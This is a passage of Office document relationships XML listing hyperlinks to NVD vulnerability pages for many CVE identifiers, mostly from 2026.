TargetMode="External" Id="rId1316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77955" TargetMode="External" Id="rId1317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78547" TargetMode="External" Id="rId1318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84551" TargetMode="External" Id="rId1319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86341" TargetMode="External" Id="rId1320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88914" TargetMode="External" Id="rId1321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92588" TargetMode="External" Id="rId1322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11993" TargetMode="External" Id="rId1323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12882" TargetMode="External" Id="rId1324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13417" TargetMode="External" Id="rId1325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14259" TargetMode="External" Id="rId1326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14344" TargetMode="External" Id="rId1327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16794" TargetMode="External" Id="rId1328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18251" TargetMode="External" Id="rId1329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18515" TargetMode="External" Id="rId1330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20285" TargetMode="External" Id="rId1331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20286" TargetMode="External" Id="rId1332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-29810" TargetMode="External" Id="rId1333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-29812" TargetMode="External" Id="rId1334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54247" TargetMode="External" Id="rId1335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57128" TargetMode="External" Id="rId1336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61909" TargetMode="External" Id="rId1337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61911" TargetMode="External" Id="rId1338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73019" TargetMode="External" Id="rId1339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7514" TargetMode="External" Id="rId1340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75792" TargetMode="External" Id="rId1341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8030" TargetMode="External" Id="rId1342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84518" TargetMode="External" Id="rId1343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85173" TargetMode="External" Id="rId1344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86348" TargetMode="External" Id="rId1345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86349" TargetMode="External" Id="rId1346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86769" TargetMode="External" Id="rId1347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87017" TargetMode="External" Id="rId1348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87019" TargetMode="External" Id="rId1349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87035" TargetMode="External" Id="rId1350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87046" TargetMode="External" Id="rId1351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87994" TargetMode="External" Id="rId1352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87997" TargetMode="External" Id="rId1353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89029" TargetMode="External" Id="rId1354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89321" TargetMode="External" Id="rId1355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92141" TargetMode="External" Id="rId1356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92357" TargetMode="External" Id="rId1357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92363" TargetMode="External" Id="rId1358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92365" TargetMode="External" Id="rId1359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92413" TargetMode="External" Id="rId1360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92416" TargetMode="External" Id="rId1361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92455" TargetMode="External" Id="rId1362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92458" TargetMode="External" Id="rId1363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92569" TargetMode="External" Id="rId1364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92581" TargetMode="External" Id="rId1365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92585" TargetMode="External" Id="rId1366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92586" TargetMode="External" Id="rId1367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92589" TargetMode="External" Id="rId1368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92754" TargetMode="External" Id="rId1369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92764" TargetMode="External" Id="rId1370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92774" TargetMode="External" Id="rId1371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92802" TargetMode="External" Id="rId1372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92809" TargetMode="External" Id="rId1373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92810" TargetMode="External" Id="rId1374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12763" TargetMode="External" Id="rId1375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18151" TargetMode="External" Id="rId1376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92131" TargetMode="External" Id="rId1377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92138" TargetMode="External" Id="rId1378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92814" TargetMode="External" Id="rId1379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82783" TargetMode="External" Id="rId1380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90463" TargetMode="External" Id="rId1381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90994" TargetMode="External" Id="rId1382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90996" TargetMode="External" Id="rId1383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20071" TargetMode="External" Id="rId1384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87026" TargetMode="External" Id="rId1385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18540" TargetMode="External" Id="rId1386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54541" TargetMode="External" Id="rId1387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69200" TargetMode="External" Id="rId1388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77860" TargetMode="External" Id="rId1389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81159" TargetMode="External" Id="rId1390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86071" TargetMode="External" Id="rId1391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-24035" TargetMode="External" Id="rId1392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33970" TargetMode="External" Id="rId1393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46460" TargetMode="External" Id="rId1394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92214" TargetMode="External" Id="rId1395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92381" TargetMode="External" Id="rId1396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-32778" TargetMode="External" Id="rId1397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19086" TargetMode="External" Id="rId1398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45761" TargetMode="External" Id="rId1399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49400" TargetMode="External" Id="rId1400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89162" TargetMode="External" Id="rId1401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92473" TargetMode="External" Id="rId1402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92474" TargetMode="External" Id="rId1403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-37252" TargetMode="External" Id="rId1404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-37253" TargetMode="External" Id="rId1405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16190" TargetMode="External" Id="rId1406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-3855" TargetMode="External" Id="rId1407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92130" TargetMode="External" Id="rId1408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71181" TargetMode="External" Id="rId1409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71182" TargetMode="External" Id="rId1410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-24287" TargetMode="External" Id="rId1411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90575" TargetMode="External" Id="rId1412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-37366" TargetMode="External" Id="rId1413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64031" TargetMode="External" Id="rId1414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92385" TargetMode="External" Id="rId1415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19640" TargetMode="External" Id="rId1416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73440" TargetMode="External" Id="rId1417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82060" TargetMode="External" Id="rId1418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86089" TargetMode="External" Id="rId1419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92359" TargetMode="External" Id="rId1420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73442" TargetMode="External" Id="rId1421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75943" TargetMode="External" Id="rId1422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75945" TargetMode="External" Id="rId1423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77191" TargetMode="External" Id="rId1424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87031" TargetMode="External" Id="rId1425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90501" TargetMode="External" Id="rId1426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90511" TargetMode="External" Id="rId1427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90580" TargetMode="External" Id="rId1428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90598" TargetMode="External" Id="rId1429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90700" TargetMode="External" Id="rId1430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90793" TargetMode="External" Id="rId1431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90807" TargetMode="External" Id="rId1432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90812" TargetMode="External" Id="rId1433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90818" TargetMode="External" Id="rId1434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92364" TargetMode="External" Id="rId1435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92383" TargetMode="External" Id="rId1436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81870" TargetMode="External" Id="rId1437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85387" TargetMode="External" Id="rId1438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90496" TargetMode="External" Id="rId1439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90695" TargetMode="External" Id="rId1440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90705" TargetMode="External" Id="rId1441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90716" TargetMode="External" Id="rId1442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90788" TargetMode="External" Id="rId1443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92247" TargetMode="External" Id="rId1444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92418" TargetMode="External" Id="rId1445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90573" TargetMode="External" Id="rId1446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90613" TargetMode="External" Id="rId1447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90802" TargetMode="External" Id="rId1448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90829" TargetMode="External" Id="rId1449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90830" TargetMode="External" Id="rId1450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90831" TargetMode="External" Id="rId1451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92472" TargetMode="External" Id="rId1452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64059" TargetMode="External" Id="rId1453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90506" TargetMode="External" Id="rId1454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90685" TargetMode="External" Id="rId1455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90826" TargetMode="External" Id="rId1456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81866" TargetMode="External" Id="rId1457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-56563" TargetMode="External" Id="rId1458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-56565" TargetMode="External" Id="rId1459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-56566" TargetMode="External" Id="rId1460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38999" TargetMode="External" Id="rId1461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51990" TargetMode="External" Id="rId1462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58657" TargetMode="External" Id="rId1463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59739" TargetMode="External" Id="rId1464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59965" TargetMode="External" Id="rId1465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59969" TargetMode="External" Id="rId1466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61396" TargetMode="External" Id="rId1467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61560" TargetMode="External" Id="rId1468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65388" TargetMode="External" Id="rId1469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68536" TargetMode="External" Id="rId1470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70469" TargetMode="External" Id="rId1471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74926" TargetMode="External" Id="rId1472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76186" TargetMode="External" Id="rId1473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76187" TargetMode="External" Id="rId1474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76550" TargetMode="External" Id="rId1475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76551" TargetMode="External" Id="rId1476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76552" TargetMode="External" Id="rId1477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76553" TargetMode="External" Id="rId1478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76555" TargetMode="External" Id="rId1479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76556" TargetMode="External" Id="rId1480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 